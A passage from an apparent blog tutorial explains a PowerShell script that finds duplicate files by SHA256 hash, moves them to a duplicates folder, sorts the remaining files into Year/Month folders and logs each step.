Assigns severity levels (INFO, WARNING, ERROR).
Writes logs to the designated log file.

3. Directory Validation and Setup

Before processing files, the script checks whether the specified directory exists:

if (-not (Test-Path -Path $Data2SortPath)) {
    Write-MoveLog "Error: The specified path '$Data2SortPath' does not exist." "ERROR"
    throw "The specified path does not exist."
}

If the directory does not exist, an error is logged and execution is halted. Similarly, it ensures the duplicates folder exists or creates it:

if (-not (Test-Path -Path $duplicatesPath)) {
    New-Item -Path $duplicatesPath -ItemType Directory -Force | Out-Null
    Write-MoveLog "Created duplicates folder at '$duplicatesPath'." "INFO"
}

4. Retrieving Files for Processing

The script gathers all files within the directory, excluding anything already in the duplicates folder as well as .log and .zip files. Note that the conditions must all be joined with -and; mixing -or and -and here would let log and zip files slip back into the run:

$gtFiles = Get-ChildItem -Path $Data2SortPath -Recurse -File |
    Where-Object { $_.DirectoryName -notmatch "duplicates" -and $_.Extension -notmatch "\.log" -and $_.Extension -notmatch "\.zip" }

This ensures only relevant files are processed.

5.
Detecting and Handling Duplicates

Each file's SHA256 hash is computed to detect duplicates:

$gtFileHash = (Get-FileHash -Algorithm SHA256 -Path $file.FullName).Hash

If a duplicate is found, it is moved to the duplicates folder with a unique name to avoid overwriting:

$duplicateName = Join-Path -Path $duplicatesPath -ChildPath $file.Name
$counter = 1
while (Test-Path -Path $duplicateName) {
    $duplicateName = Join-Path -Path $duplicatesPath -ChildPath ("{0}_{1}{2}" -f $file.BaseName, $counter, $file.Extension)
    $counter++
}
Move-Item -Path $file.FullName -Destination $duplicateName
Write-MoveLog "Duplicate detected: '$($file.FullName)' moved to '$duplicateName'." "INFO"

6. Organizing Files by Date

For non-duplicate files, the script determines their last modified date and organizes them into Year/Month folders:

$year = $file.LastWriteTime.Year
$monthName = (Get-Culture).DateTimeFormat.GetMonthName($file.LastWriteTime.Month)
$yearPath = Join-Path -Path $Data2SortPath -ChildPath $year
$monthPath = Join-Path -Path $yearPath -ChildPath $monthName

If these directories do not exist, they are created:

if (-not (Test-Path -Path $yearPath)) {
    New-Item -ItemType Directory -Path $yearPath -Force | Out-Null
    Write-MoveLog "Created year folder at '$yearPath'." "INFO"
}
if (-not (Test-Path -Path $monthPath)) {
    New-Item -ItemType Directory -Path $monthPath -Force | Out-Null
    Write-MoveLog "Created month folder at '$monthPath'." "INFO"
}

Files are then moved to their respective folders:

$destination = Join-Path -Path $monthPath -ChildPath $file.Name
Move-Item -Path $file.FullName -Destination $destination -Verbose
Write-MoveLog "File '$($file.FullName)' moved to '$destination'." "INFO"

If a naming conflict occurs, the file is instead renamed and moved to the duplicates folder. Note that $destination already includes the file name, so it is the path to test directly, and $counter must be initialised before use:

if (Test-Path -Path $destination) {
    $counter = 1
    do {
        $duplicateName = Join-Path -Path $duplicatesPath -ChildPath ("{0}_{1}{2}" -f $file.BaseName, $counter, $file.Extension)
        $counter++
    } while (Test-Path -Path $duplicateName)
    Move-Item -Path $file.FullName -Destination $duplicateName
    Write-MoveLog "File '$($file.FullName)' moved to '$duplicateName'." "WARNING"
}

7. Error Handling and Final Logging

Errors are caught and logged throughout the script. The subexpression syntax $($file.FullName) matters here: without it, PowerShell would expand $file and append the literal text ".FullName":

catch {
    Write-MoveLog "Failed to move file '$($file.FullName)': $_" "ERROR"
    continue
}

Finally, a message indicates the script's completion:

Write-MoveLog "File organization complete. See details in the log file at '$LogFile'." "INFO"
Write-Host "Processing complete. Logs are saved to '$LogFile'."

Conclusion

This PowerShell script makes sorting your files a breeze! It finds duplicates, organizes everything by date, and keeps a detailed log so you always know what happened. The built-in logging helps with troubleshooting, making it easy to track any issues. Of course, if you hit any issues please provide feedback via the form on the home page. Thanks, and as always your time is appreciated.
